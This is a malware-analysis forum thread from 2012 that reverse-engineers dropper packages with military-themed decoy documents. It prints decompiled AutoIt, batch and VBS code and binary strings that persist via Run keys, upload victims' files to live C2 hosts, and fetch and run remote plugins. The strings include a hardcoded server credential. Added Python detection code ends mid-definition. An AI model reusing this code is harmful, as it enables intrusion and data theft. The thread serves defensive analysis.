 #13252  by R136a1
 Wed May 16, 2012 5:50 pm
After searching for some interesting malware samples on Threatexpert I stumbled across an interesting report:
http://www.threatexpert.com/report.aspx ... df8abd0cee

The dropper seems to be a self-extracting WinRAR package. What took my attention was the dropped file "List of mujahideen launching department.xls", which obviously is the visible part after executing the package. I thought I'd do a little search with the names of the dropped files, and it turns out there is more than one uploaded package. There are at least 6 samples which were all uploaded in May 2012:
http://www.threatexpert.com/reports.asp ... +&x=13&y=2

One of the packages contains a Word Document which is named "Military Training & Simulation Asia 2012 only one week away.doc":

If you read the content of the Word document it seems to be targeted at a general from Pakistan (package probably sent by email).

Of course all this is just speculation right now.

So if somebody has one of the following samples (or the dropped files - see reports), please upload, so there is a chance to verify my assumption:

MD5: AD03593FBB4A85EDB31FA35332A27FFE
MD5: 831C0DB692E381762C71348DD018A213
MD5: 385EC526915CD9AF91794440C8EB6793
MD5: 740650982EF127C8CD25AC9AC081D41D
MD5: 6E468FE05786B1ABA656D1DF8ABD0CEE
MD5: 5F4F603801E6A87AE0262428C8DA39F2
 #13275  by R136a1
 Thu May 17, 2012 12:22 pm
My results of the 385ec526915cd9af91794440c8eb6793 package so far:

The file is a WinRAR self-extracting archive (.SFX) with a Microsoft Word icon to make it look like an ordinary Word document at first sight.
The commands of the archive are as follows:
  • Path=C:\Windows\System\SecurityData\FilesData\ -> Where to install the files inside the archive
  • SavePath -> Save the Path in the registry for possible future use
  • Setup=C:\Windows\System\SecurityData\FilesData\y.exe -> File to run after extracting
  • Silent=1 -> Silent installation, so no windows pop up
  • Overwrite=1 -> Overwrite existing files without notification
  • Update=U -> Extract only files which are not already present in the target folder
The archive contains the following files:
  • dhclient.exe – UPX packed AutoIt v3.3.6.1 script compiled executable
  • ISAF.doc – Word document
  • y.exe – UPX packed PureBasic executable
dhclient.exe
The file has a Time Stamp of "2010/04/16 Fr 07:47:33 UTC". After unpacking the executable we can throw the compiled script into the AutoIt3 decompiler (http://www.exe2aut.com/). Look at the attachments for the decompiled script. Further analysis to come...

ISAF.doc
Contains a story of the Indian Special Frontier Force. With a quick look at the metadata we can find the username "Neeraj", who created this document.

y.exe
The file has a Time Stamp of "2010/11/08 Mo 13:12:07 UTC". It creates the batch file "y.bat" in the Temp folder with the following content, executes it and then deletes it:
Code: Select all
@ echo off
@[HKEY_CLASSES_ROOT\batfile\shell\runas]
@="Run as Administrator" 
@ start "iexplore.exe" "C:\Windows\System\SecurityData\FilesData\ISAF.doc"
@ C:\Windows\System\SecurityData\FilesData\dhclient.exe
@ attrib C:\Windows +s +h
@ attrib c:\ApplicationData +s +h
@ exit
So it opens the ISAF.doc file, runs the dhclient.exe file and changes the attributes of the Windows and ApplicationData folders to "hidden" and "system".
Attachments
 #13297  by R136a1
 Fri May 18, 2012 11:07 am
Brief analysis of dhclient.exe (AutoIt Script)

The script contains a number of functions and constants at the beginning which are not used. Since I don't have any experience with AutoIt, I guess the standard "include" parts were used here. The actual important code is as follows:
Code: Select all
$a = _checkvm()
If NOT $a = "" Then Exit 
HttpSetUserAgent("Mozilla")
Global $uploaddir = "C:\ApplicationData\Prefetch\"
Global $workdir = "C:\ApplicationData\"
Global $host = "megadeals4u.net"
Global $port = "80"
Global $page = "Minerva/getmax.php"
Global $name = @ComputerName
Global $vars = "sysname=" & $name
Global $url = $page & "?" & _httpencodestring($vars)
Global $getallurl = "http://megadeals4u.net/Minerva/getall.php?sysname=" & $name
Global $getforme = "http://megadeals4u.net/Minerva/online.php?sysname=" & $name
Global $plugins = "http://megadeals4u.net/Minerva/plugins/"
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Predefined", "REG_SZ", @ScriptFullPath)
DirCreate($workdir)
DirCreate($uploaddir)
If @ScriptName = "notepad.com" Then Run("notepad.exe")
readhttp($getallurl)
While 1
	_uploadpath()
	Sleep(10000)
	readhttp($getforme)
	Sleep(60000)
WEnd
...
..._checkvm()
As you can see, it first checks for VM presence; if one is found, the script exits silently.

HttpSetUserAgent("Mozilla")
Then it sets the user-agent to "Mozilla Firefox".

Global $uploaddir = "C:\ApplicationData\Prefetch\"
Global $workdir = "C:\ApplicationData\"
...
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Predefined", "REG_SZ", @ScriptFullPath)
DirCreate($workdir)
DirCreate($uploaddir)

Thereafter multiple variables are set, e.g. "$workdir" and "$uploaddir" are set to create the "C:\ApplicationData\..." folder, whose attributes are later set to "hidden/system". As the name indicates, the folder "C:\ApplicationData\Prefetch\" is used to store content which later gets uploaded to the server. Also, in the registry the ordinary "Run" key is created with the name of the script as value.

Global $host = "megadeals4u.net"
Global $port = "80"
...
Global $plugins = "http://megadeals4u.net/Minerva/plugins/"
...
readhttp($getallurl)

Moreover, various variables are filled with the server-related part. To my surprise the server is still online, although the files date back to the year 2010. To conclude, the operation is still ongoing...
Also, as the variable "$plugins" indicates, there are more components which can be installed from the server.

The readhttp() function:
Code: Select all
Func readhttp($url)
	Local $urllist
	Local $sdata = InetRead($url, 1)
	If $sdata = "" Then Return 
	$sdata = BinaryToString($sdata)
	$urllist = StringSplit($sdata, ";", 1)
	For $i = 1 To $urllist[0]
		$urllist[$i] = $plugins & $urllist[$i]
		If NOT FileExists($workdir & path2file($urllist[$i])) Then InetGet($urllist[$i], $workdir & path2file($urllist[$i]))
		If FileExists($workdir & path2file($urllist[$i])) Then Run($workdir & path2file($urllist[$i]), "", @SW_HIDE)
		$urllist[$i] = ""
	Next
EndFunc

Func path2file($path)
	Dim $szdrive, $szdir, $szfname, $szext
	$path = _pathsplit($path, $szdrive, $szdir, $szfname, $szext)
	Return $szfname & $szext
EndFunc
At the end of the code there is an endless loop which continuously uploads the content from the "C:\ApplicationData\Prefetch\" folder to the server:
While 1
_uploadpath()
Sleep(10000)
readhttp($getforme)
Sleep(60000)
WEnd


_uploadpath() function:
Code: Select all
Func _uploadpath()
	FileChangeDir($uploaddir)
	$search = FileFindFirstFile("*.*")
	If $search = -1 Then
		Return 
	EndIf
	While 1
		Sleep(1000)
		$file = FileFindNextFile($search)
		If @error Then ExitLoop 
		$socket = _httpconnect($host, $port)
		$get = _httppost_file($host, $url, $socket, $file, "filename")
		$recv = _httpread($socket, 0)
		If $recv = 1 Then FileDelete($file)
	WEnd
	FileClose($search)
	Return 
EndFunc

Func _httppost_file($host, $page, $socket = -1, $file = "", $fieldname = "")
	Dim $command
	If $socket == -1 Then
		If $_httplastsocket == -1 Then
			SetError(1)
			Return 
		EndIf
		$socket = $_httplastsocket
	EndIf
	$contenttype = _httppost_contenttype($file)
	$boundary = "------" & Chr(Random(Asc("A"), Asc("Z"), 3)) & Chr(Random(Asc("a"), Asc("z"), 3)) & Chr(Random(Asc("A"), Asc("Z"), 3)) & Chr(Random(Asc("a"), Asc("z"), 3)) & Random(1, 9, 1) & Random(1, 9, 1) & Random(1, 9, 1)
	$fileopen = FileOpen($file, 0)
	$fileread = FileRead($fileopen)
	FileClose($fileopen)
	$extra_commands = "--" & $boundary & @CRLF
	$extra_commands &= 'Content-Disposition: form-data; name="' & $fieldname & '"; filename="' & $file & '"' & @CRLF
	$extra_commands &= "Content-Type: " & $contenttype & @CRLF & @CRLF
	$extra_commands &= $fileread & @CRLF
	$extra_commands &= "--" & $boundary & "--"
	Dim $datasize = StringLen($extra_commands)
	$command = "POST /" & $page & " HTTP/1.1" & @CRLF
	$command &= "Host: " & $host & ":" & $port & @CRLF
	$command &= "User-Agent: " & $_httpuseragent & @CRLF
	$command &= "Content-Type: multipart/form-data; boundary=" & $boundary & @CRLF
	$command &= "Connection: Close" & @CRLF
	$command &= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" & @CRLF
	$command &= "Content-Length: " & $datasize & @CRLF & @CRLF
	$command &= $extra_commands
	Dim $bytessent = TCPSend($socket, $command)
	If $bytessent == 0 Then
		SetExtended(@error)
		SetError(2)
		Return 0
	EndIf
	SetError(0)
	Return $bytessent
EndFunc

Func _httppost_contenttype($file = "")
	$fileextension = StringRight($file, 4)
	Switch $fileextension
		Case ".txt"
			$contenttype = "text/plain"
		Case Else
			$contenttype = "application/octet-stream"
	EndSwitch
	Return $contenttype
EndFunc
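Added example, not from the post or the decompiled script: detection logic in Python that flags the Minerva beacons described above (getall.php / online.php / getmax.php with a sysname parameter, the bare "Mozilla" user-agent set by HttpSetUserAgent, and /plugins/ downloads) in a CLF-style proxy log. The log format and the log lines are constructed for the example.

```python
"""Flag dhclient.exe (Minerva) beacons in a CLF-style proxy log (constructed sample)."""
import re
from urllib.parse import parse_qs, urlsplit

# CLF with request URL, status, size, referer and user-agent (assumed log format).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Endpoints from the decompiled script; hosts seen in the two packages of this thread.
BEACON_PATHS = ("getmax.php", "getall.php", "online.php")
KNOWN_HOSTS = {"megadeals4u.net", "shopingcard.net"}

# Constructed log lines (not captured traffic): three beacons, one benign request,
# one plugin download.
SAMPLE_LOG = """\
10.1.2.3 - - [19/May/2012:09:10:11 +0000] "GET http://megadeals4u.net/Minerva/getall.php?sysname=PC-OFFICE-07 HTTP/1.1" 200 12 "-" "Mozilla"
10.1.2.3 - - [19/May/2012:09:10:21 +0000] "POST http://megadeals4u.net/Minerva/getmax.php?sysname=PC-OFFICE-07 HTTP/1.1" 200 1 "-" "Mozilla"
10.1.2.3 - - [19/May/2012:09:11:21 +0000] "GET http://megadeals4u.net/Minerva/online.php?sysname=PC-OFFICE-07 HTTP/1.1" 200 0 "-" "Mozilla"
10.1.2.9 - - [19/May/2012:09:12:00 +0000] "GET http://www.example.com/index.php?sysname=test HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/12.0"
10.1.2.3 - - [19/May/2012:09:12:31 +0000] "GET http://megadeals4u.net/Minerva/plugins/update.exe HTTP/1.1" 200 40960 "-" "Mozilla"
"""


def parse_line(line):
    """Return the named fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(rec):
    """Label a parsed record as beacon/upload/plugin-download, or None if benign."""
    u = urlsplit(rec["url"])
    host = u.hostname or ""
    query = parse_qs(u.query)
    last = u.path.rsplit("/", 1)[-1]
    # HttpSetUserAgent("Mozilla") yields a UA with no version or platform string.
    bare_ua = rec["ua"] == "Mozilla"
    if last in BEACON_PATHS and "sysname" in query and (bare_ua or host in KNOWN_HOSTS):
        # _uploadpath() POSTs files to getmax.php; the other two are GET polls.
        kind = "upload" if rec["method"] == "POST" else "beacon"
        return "%s:%s" % (kind, query["sysname"][0])
    if "/plugins/" in u.path and (bare_ua or host in KNOWN_HOSTS):
        return "plugin-download:" + last
    return None


def scan(log_text):
    """Return (client, method, label) for every line classified as malicious."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label:
            hits.append((rec["client"], rec["method"], label))
    return hits
```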
 #13299  by R136a1
 Fri May 18, 2012 3:27 pm
Summary for 385ec526915cd9af91794440c8eb6793

It is a WinRAR self-extracting archive which contains:

ISAF.doc
Visible part after execution

dhclient.exe
AutoIt compiled Script for uploading information or downloading plugins from server "http://megadeals4u.net/Minerva"

y.exe
Actual dropper for dhclient.exe and y.bat

y.bat
Opening ISAF.doc and executing dhclient.exe as Administrator

Conclusion
  • The threat itself is quite simple, but nonetheless it may still be effective (see "Operation Shady RAT" or "The Luckycat Hackers")
  • The used languages (AutoIt, PureBasic) for creating the executables were probably used to evade AV heuristics
  • The binaries are from 2010, maybe since that time the package evolved in some way
  • The server "megadeals4u.net" is still up and running thus indicating the operation is still ongoing
  • The WinRAR self-extracting archive was probably sent by email and the receiver was fooled to open it by social engineering tricks (see MS Word icon)
  • It seems like a political/military motivated attack, since the "ISAF.doc" file contains that topic
If some AV guys see this:
Maybe you are interested in the threat and want to help us get more information (server, target, ...).
 #13312  by R136a1
 Sat May 19, 2012 9:09 am
My analysis for the 6e468fe05786b1aba656d1df8abd0cee package

At first sight the file is also a self-extracting archive (.SFX) which can be unpacked with a common file archiver. You can actually open the archive and see the content, but after several unsuccessful attempts to extract the files (7-Zip, WinRAR, IZArc) I began to realize it was packed with some "special" tool. By looking at the Strings in IDA Pro I found the corresponding hint "This Zip has been encrypted with Chilkat Zip (http://www.chilkatsoft.com)". After visiting the Website I found the tool which was probably used (http://www.chilkatsoft.com/chilkatsfx.asp).
Now what is so special about this tool?
It cannot be unpacked with common tools like WinZip, WinRAR, 7-Zip, ... because of its extraordinary technique:
Chilkat’s Self-Extracting EXE Format

The internal format of the self-extracting EXE’s produced by Chilkat Zip’s WriteExe method, or by the Zip-2-Secure-EXE utility program is (at this point) proprietary and undocumented. Chilkat decided against using a .zip file format internal to the EXE for two reasons: complexities due to 64-bit size issues, and complexities/limitations involving Unicode filenames. The undocumented Chilkat format is a very simple compressed streaming file format (more similar to TAR, but with compression and far simpler) with no limitations on file sizes, number of files, Unicode filenames, etc. It also self-optimizes by compressing files in chunks. If a file does not compress well after the first few chunks (such as with already-compressed format such as JPG, PDF, etc.) then it will suppress compression for a time and re-sample periodically to see if compression should resume or not. The intent is to get the best trade-off automatically between compression and performance.
A self-extracting EXE created by Chilkat Zip, or by Chilkat’s Zip-2-Secure-EXE utility program cannot be opened by WinZip, 7-Zip, or any other “zip” tool, including Chilkat Zip. (Chilkat may in the future add functionality to “open-and-extract” a Chilkat-created self-extracting EXE.)

Source: http://www.cknotes.com/?p=351
This was new to me, so I had to catch the files with dynamic analysis:

Execution of 6e468fe05786b1aba656d1df8abd0cee.exe
It drops the file "List of mujahideen launching department.xls.exe" in the (created) folder "c:\documents And settings\<user>\local settings\temp\ckz_FN0L" and executes it. After "List of mujahideen launching department.xls.exe" execution is finished it gets deleted.

List of mujahideen launching department.xls.exe
The file is packed with UPX and is a WinRAR self-extracting archive (.SFX) similar to the archive we had before (see 385ec526915cd9af91794440c8eb6793 analysis).
This time the commands are as follows:
  • Path=C:\Windows\manager\servce\task\ -> Where to install the files inside the archive
  • SavePath -> Save the Path in the registry for possible future use
  • Setup=C:\Windows\manager\servce\task\hr.vbs -> File to run after extracting
  • Silent=1 -> Silent installation, so no windows pop up
  • Overwrite=2 -> Existing files will not be overwritten!
It contains the following files:
  • hr.vbs
    Executes the file "lucky.exe" and sets "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden" and "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt" to the value "2", thus making file extensions and hidden files/folders invisible.
    Code: Select all
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run chr(34) & "c:\Windows\manager\servce\task\lucky.exe" & Chr(34), 0
    Set WshShell = Nothing
    Dim WshShell
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 2, "REG_DWORD"
    WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 2, "REG_DWORD"
    WScript.Quit
  • List of mujahideen launching department.xls
    A simple MS Excel document with a few random names, nothing interesting. The metadata shows the author's name is "Satark".
  • lucky.exe
    Creates the file "lucky.bat" in folder "c:\documents And settings\<user>\local settings\temp\<number>D.Temp\" and executes it. After execution, lucky.bat and the folder "<number>D.Temp" get deleted.
  • lucky.bat
    Opens "List of mujahideen launching department.xls" and executes "dhclient.exe". Thereafter it sets the attributes of the folders "c:\Windows\manager\servce\" and "c:\recycler" to hidden/system.
    Then it deletes the file "storage-mozStorage.js" from Firefox.
    Moreover it executes the Windows tools systeminfo.exe and ipconfig.exe and writes the results into text files in folder "c:\Recycler\cache\". This seems to be an implementation mistake, since the folder "cache" was not created before and the output redirection with ">" only works if the folder exists. But the path "c:\Recycler\cache\1Systeminfo.txt" reveals some additional interesting discoveries (see next post).
    Code: Select all
    @ echo off
    @[HKEY_CLASSES_ROOT\batfile\shell\runas]
    @="Run as Administrator" 
    @ start "iexplore.exe" "c:\Windows\manager\servce\task\List of mujahideen launching department.xls"
    @ c:\Windows\manager\servce\task\dhclient.exe
    @ attrib c:\Windows\manager\servce\ +s +h
    @ attrib c:\recycler +s +h
    del /q "C:\Program Files\Mozilla Firefox\components\storage-mozStorage.js"
    systeminfo > c:\Recycler\cache\1Systeminfo.txt
    ipconfig /all > c:\Recycler\cache\1ip.txt
    @ exit
  • dhclient
    Exactly the same file as described above, except that it contacts the server at http://shopingcard.net/ and http://shopingcard.net/boot/ respectively.
Attachments
PW: infected
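Added example, not part of the original posts or the samples: a Python parser for the WinRAR SFX script commands listed for both the 385ec526915cd9af91794440c8eb6793 and the 6e468fe05786b1aba656d1df8abd0cee package, with risk flags for the silent-extract-then-run pattern both share. The two comment texts are reconstructed from the command lists in this thread, not the archives' original comment bytes.

```python
"""Parse WinRAR SFX script commands (archive comment) and flag risky combinations."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed SFX comment texts rebuilt from the command lists in this thread.
SFX_SCRIPT_385EC = """;SFX script, 385ec526915cd9af91794440c8eb6793 package
Path=C:\\Windows\\System\\SecurityData\\FilesData\\
SavePath
Setup=C:\\Windows\\System\\SecurityData\\FilesData\\y.exe
Silent=1
Overwrite=1
Update=U
"""

SFX_SCRIPT_6E468 = """;SFX script, 6e468fe05786b1aba656d1df8abd0cee package
Path=C:\\Windows\\manager\\servce\\task\\
SavePath
Setup=C:\\Windows\\manager\\servce\\task\\hr.vbs
Silent=1
Overwrite=2
"""


@dataclass
class SfxScript:
    path: Optional[str] = None
    save_path: bool = False
    setup: List[str] = field(default_factory=list)   # Setup= may appear more than once
    silent: int = 0
    overwrite: Optional[int] = None
    update: Optional[str] = None
    other: Dict[str, str] = field(default_factory=dict)


def parse_sfx_script(text: str) -> SfxScript:
    """Parse Key=Value commands; skips ';' comments and Text{...}/License{...} blocks."""
    script = SfxScript()
    in_block = False
    for raw in text.splitlines():
        line = raw.strip()
        if in_block:
            in_block = line != "}"        # block ends at a closing brace
            continue
        if not line or line.startswith(";"):
            continue
        if line.endswith("{"):            # start of a multi-line block
            in_block = True
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower(), value.strip()
        if key == "path":
            script.path = value
        elif key == "savepath":
            script.save_path = True
        elif key == "setup":
            script.setup.append(value)
        elif key == "silent":
            script.silent = int(value or "0")
        elif key == "overwrite":
            script.overwrite = int(value)
        elif key == "update":
            script.update = value.upper()
        else:
            script.other[key] = value
    return script


EXEC_EXT = (".exe", ".com", ".scr", ".bat", ".cmd", ".vbs", ".js")


def risk_flags(script: SfxScript) -> List[str]:
    """Flags for the pattern in this thread: silent install under C:\\Windows, then run."""
    flags = []
    if script.silent == 1 and script.setup:
        flags.append("silent-extract-and-run")
    if any(cmd.lower().endswith(EXEC_EXT) for cmd in script.setup):
        flags.append("setup-runs-script-or-binary")
    if script.path and re.match(r"(?i)^[a-z]:\\windows\\", script.path):
        flags.append("path-under-windows-dir")
    if script.save_path:
        flags.append("path-persisted-in-registry")
    return flags
```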
 #13315  by R136a1
 Sat May 19, 2012 9:43 am
So it turns out that my assumption "The binaries are from 2010, maybe since that time the package evolved in some way" was correct.
By using the path (c:\Recycler\cache\1<xxx>) from the latest analyzed Batch file (lucky.bat) for searching purposes I found multiple other similar threats:

Link: http://www.threatexpert.com/reports.aspx?page=4&find=c%3A\RECYCLER\Cache\

A quick MD5 search in Virustotal showed some of the files have a Time Stamp from year 2011, so they are probably the advancement of the files from 2010 (see above).

So if somebody has one or more of the following files (MD5), please upload (the list of hashes is omitted here):

 #13446  by R136a1
 Sun May 27, 2012 12:37 pm
Let's analyze dc33473683dc363f70aed095f82acd64 (DnsSvc.exe)

1) Information Gathering
  • Hex Editor
    - There is no "Rich" header, so no Microsoft compiler was used
    - By looking at the section names we see ".bss" section. I personally know only Delphi which uses this name, but Delphi creates more sections than we have here. Conclusion is we have some "uncommon" compiler here.
    - We see many (interesting) strings in cleartext, so no string obfuscation was used
    - The strings ".../gcc/gcc/config/i386/w32-shared-ptr.c", "gnu_exception_handler..." and "..._mingw_CRTStartup..." indicate the MinGW developer environment was used to build the file
  • PE Editor
    - Time Date Stamp "2011/09/19 Mo 09:27:05 UTC"
    - No resource section, so it's unlikely that it contains some files to drop
    - Import Table (some interesting functions): FindFirstFile, FindNextFile, GetComputerName (kernel32.dll); RegOpenKeyEx, RegSetValueEx (advapi32.dll); WSAStartup, gethostbyname, connect, htons, recv, send, socket (wsock32.dll)
    - PEiD says (and we trust it): "Dev-C++ 4.9.9.2 -> Bloodshed Software [Overlay]"
    Bloodshed Dev-C++ is a full-featured Integrated Development Environment (IDE) for the C/C++ programming language. It uses the MinGW port of GCC (GNU Compiler Collection) as its compiler.
    - PEiD says: Subsystem = Win32 console
    - PEiD PlugIn Krypto ANALyzer (KANAL v.2.92) says: "No known crypto signatures found"
2) Static analysis (IDA Pro 5.0 free)
Strings:
Code: Select all
C:\\recycler\\cache\\                                        
md C:\\recycler\\cache\\                                     
copy DnsSvc.exe C:\\recycler\\                               
Software\\Microsoft\\Windows\\CurrentVersion\\Run            
My Directry8                                                 
connecting to server\n                                       
momate.net                                                   
not connected with momate\n                                  
connected\n                                                  
MachineGuid                                                  
SOFTWARE\\Microsoft\\Cryptography\\                          
Computer Name: %s\n                                          
cName==%s\n                                                  
_data                                                        
%s%s%s                                                       
s=%d                                                         
Error                                                        
susnata                                                      
r====%d\n                                                    
exe1====%s                                                   
C:\\recycler\\                                               
%s%s                                                         
buffer==%s\n                                                 
size===%d\n                                                  
exe data receiving over\n                                    
===========///////////============\n                         
Clientmgr.exe                                                
attrib +h C:\\recycler\\Clientmgr.exe                        
Clientmgr copied\n                                           
open                                                         
---------------///-------------\n                            
.........out of while............\n                          
--------------------------------------------------------\n   
attrib +h C:\\recycler\\Clientmgr.ini                        
==scan finished==\n                                          
not connected  \n                                            
dest====%s\n                                                 
C:\\recycler\\cache\\*.*                                     
file %s\n                                                    
c1===%s\n                                                    
exit                                                         
/home/momate/domains/momate.net/public_html/HTTP/            
put c:\\recycler\\cache\\                                    
option batch continue                                        
/command                                                     
ssh-rsa 2048 a5:05:93:ae:ac:26:6b:6b:1c:2f:14:07:46:67:56:9e 
/hostkey=                                                    
root:Iy7@@g5$$#N@momate.net                                  
c:\\recycler\\Clientmgr.exe                                  
%s %s %s%c%s%c %s %c%s%c %c%s%c%c%s%c%c %s%s%c%c %s          
win===%s\n                                                   
done\n                                                       
C:\\recycler\\cache\\                                        
%s %s%c%s%c                                                  
ccc====%s\n                                                  
no===\n                                                      
==scan end===\n                                              
w32_sharedptr->size == sizeof(W32_EH_SHARED)                 
%s:%u: failed assertion `%s'\n                               
../../gcc/gcc/config/i386/w32-shared-ptr.c                   
GetAtomNameA (atom, s, sizeof(s)) != 0

Code:
Part 1 - Setup and contacting
First of all the program creates the folder "C:\recycler\cache\" and copies itself (DnsSvc.exe) into it. What is noticeable is that it uses shell commands by calling the C system() function, namely "md" (make directory) and "copy". The use of such commands can be observed throughout the whole code.
Thereafter it creates an Autorun key "My Directry8" in "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" with the value "C:\recycler\DnsSvc.exe".

Figure 1: Installation routine

Now it initiates the use of the Winsock DLL with WSAStartup() function. If it succeeds the code continues, otherwise the program exits.
By calling the socket() function it creates a socket. Then it creates a "sockaddr" structure and fills it subsequently with the appropriate values which later is required for the connect() function. So it calls the htons() function to convert the hex value "0x6A4" (1700 decimal -> Port) from host to TCP/IP network byte order. Afterwards it constantly tries to get a "hostent" structure from the host h**p://momate.net by using the gethostbyname() function.
If it was successful a follow up function (Part 2) is called, otherwise it sleeps for 5 seconds and the loop continues to resolve the host.

Part 2 - File download
First it fills the last entry of the "sockaddr" structure with the pointer to the IP address(es) resolved with the "gethostbyname" function. Then it connects to the host "momate.net" by calling the connect() function. If it fails to connect it ends up in the loop described at the end of Part 1, otherwise it continues.
By calling the SHGetValue() function the program gets the "MachineGUID" from the registry path "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\". This Globally Unique Identifier is combined with the Computer Name by calling the GetComputerName() and strcat() functions. After this by calling the sprintf() function it creates the string "C:_<MachineGUID+ComputerName>_data" and stores it into a buffer for later use (see Part 3).
Then it sends 500 bytes of data with the send() function to the host (momate.net) containing the string "<MachineGUID+ComputerName>". Thereon it receives 50 bytes of data with the recv() function and stores it into another buffer. The data inside this buffer is compared to the string "susnata", thus checking if the computer is already infected and the "Clientmgr.exe" tool (see below) was already downloaded.

Figure 2: Comparison of server response

If this is not the case the program creates a binary file with fopen() function in "C:\recycler\" folder. Then it receives from the host 10 bytes of data which contains the size of the binary as string. The string gets converted into an integer by calling the atoi() function and then used as a counter for the following loop.
The loop starts with receiving a byte and storing it into a buffer. This byte gets immediately written to the binary file with the fwrite() function. Afterwards the buffer is overwritten with "0", the file size gets decreased and the loop continues. After the whole binary data was received the file gets closed with the fclose() function and gets executed with the ShellExecute() function.
Then again it receives the 50 bytes of data (loop) and stores it into the same buffer as above. This time the "susnata" comparison ends up in the new location where the program sleeps for 5 seconds, sets the (after file execution created) file attribute of "Clientmgr.ini" to hidden and jumps into the follow up function (Part 3).

Part 3 - File upload
Here the program scans the folder "C:\recycler\cache\" for files by using the FindFirstFile() function. If successful, the program continues, otherwise FindClose() is called and the execution flow ends up in the loop of Part 2.
Now the downloaded "Clientmgr.exe" program of Part 2 gets executed with a quite long list of parameters:
Clientmgr.exe root:Iy7@@g5$$#N@momate.net /hostkey="ssh-rsa 2048 a5:05:93:ae:ac:26:6b:6b:1c:2f:14:07:46:67:56:9e" /command "option batch continue" "put c:\\recycler\\cache\\""<NameOfFileToBeUploaded>"" /home/momate/domains/momate.net/public_html/HTTP/C:_<MachineGUID+ComputerName>_data/" exit

Figure 3: Execution of Clientmgr.exe

It's obvious that the file from folder c:\recycler\cache\ gets uploaded to the host with the help of the downloaded SSH client tool (Clientmgr.exe). Unfortunately I wasn't able to get a copy of this program, so I can't tell if it is a public or private tool. Although the server is still up and running, it isn't responding to the DnsSvc.exe query, thus indicating the scripts were removed.

Figure 4: DnsSvc.exe connection (patched to show console)

After a successful upload the string "aa" is sent by calling the send() function and the uploaded file gets deleted from folder "C:\recycler\cache\". Then the next file (if present) gets uploaded in the same way as described.

Server:
A whois query for momate.net reveals the following information, thus indicating the server was probably hacked.
Code: Select all
Domain Name: MOMATE.NET 

Registrant:
    Faygo-Connections
    Amanda Ramada        (amanda.ramada@hotmail.com)
    H-147 , park lane 
    street 14-b
    South Block
    California State San Marcos
    California,92096
    US
    Tel. +1.41512355236

Creation Date: 23-Jul-2011  
Expiration Date: 23-Jul-2012

Domain servers in listed order:
    ns1.suspended-domian.com
    ns2.suspended-domian.com

Administrative Contact:
    Faygo-Connections
    Amanda Ramada        (amanda.ramada@hotmail.com)
    H-147 , park lane 
    street 14-b
    South Block
    California State San Marcos
    California,92096
    US
    Tel. +1.41512355236

Technical Contact:
    Faygo-Connections
    Amanda Ramada        (amanda.ramada@hotmail.com)
    H-147 , park lane 
    street 14-b
    South Block
    California State San Marcos
    California,92096
    US
    Tel. +1.41512355236

Billing Contact:
    Faygo-Connections
    Amanda Ramada        (amanda.ramada@hotmail.com)
    H-147 , park lane 
    street 14-b
    South Block
    California State San Marcos
    California,92096
    US
    Tel. +1.41512355236

Status:LOCKED
3) Conclusion
  • The executable is easy and straightforward to reverse, because of its small size and missing obfuscation
  • The executable was created as a console application (hidden) with many printf() function calls inside for information/debugging purposes, so it's easy to follow the execution flow
  • The binary executes a lot of its tasks with the help of system commands, maybe to prevent AV heuristic detection, maybe the author has just a low skill level, who knows...
  • The binary DnsSvc.exe is just a part of the whole infection, because the component which copies the files to the "C:\recycler\cache\" folder is missing (see also http://www.threatexpert.com/report.aspx ... 48716ab35f)
  • The server momate.net is up and running, but not responding to the DnsSvc.exe requests, thus indicating the operation ended and the responding PHP scripts were removed
  • Other servers from the same operation are also down: h**p://greenpeacesite.com, h**p://www.secure.vendetta-series.info, h**p://www.polarfargo.net
-> End of the game

Really?

Not necessarily! Let's see, I found a server which is still running...

To be continued...
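Added example, not from the post or the binary: a Python decoder for the DnsSvc.exe exchange as described in Parts 2 and 3, useful for reconstructing a captured session. It follows the framing given above (500-byte client identifier, 50-byte status compared with "susnata", 10-byte atoi() length field, raw file bytes). The sample streams, the GUID and the computer name are constructed, and treating the 50-byte status as a NUL-terminated C string is an assumption.

```python
"""Decode the DnsSvc.exe <-> momate.net exchange from captured stream bytes."""
import re

ID_LEN, STATUS_LEN, LEN_FIELD = 500, 50, 10   # buffer sizes from the write-up
MARKER = b"susnata"                           # "already infected" status


def cstr(buf: bytes) -> bytes:
    """Bytes up to the first NUL, i.e. what a strcmp()/atoi() on the buffer sees
    (assumption: the binary treats the fixed-size buffers as C strings)."""
    return buf.split(b"\0", 1)[0]


def atoi(buf: bytes) -> int:
    """C atoi(): skip whitespace, optional sign, digits up to the first non-digit, else 0."""
    m = re.match(rb"\s*([+-]?\d+)", cstr(buf))
    return int(m.group(1)) if m else 0


def decode_client_hello(stream: bytes) -> str:
    """Host identifier (MachineGuid + ComputerName) from the client's 500-byte send()."""
    if len(stream) < ID_LEN:
        raise ValueError("truncated client hello")
    return cstr(stream[:ID_LEN]).decode("ascii", "replace")


def decode_server_stream(stream: bytes):
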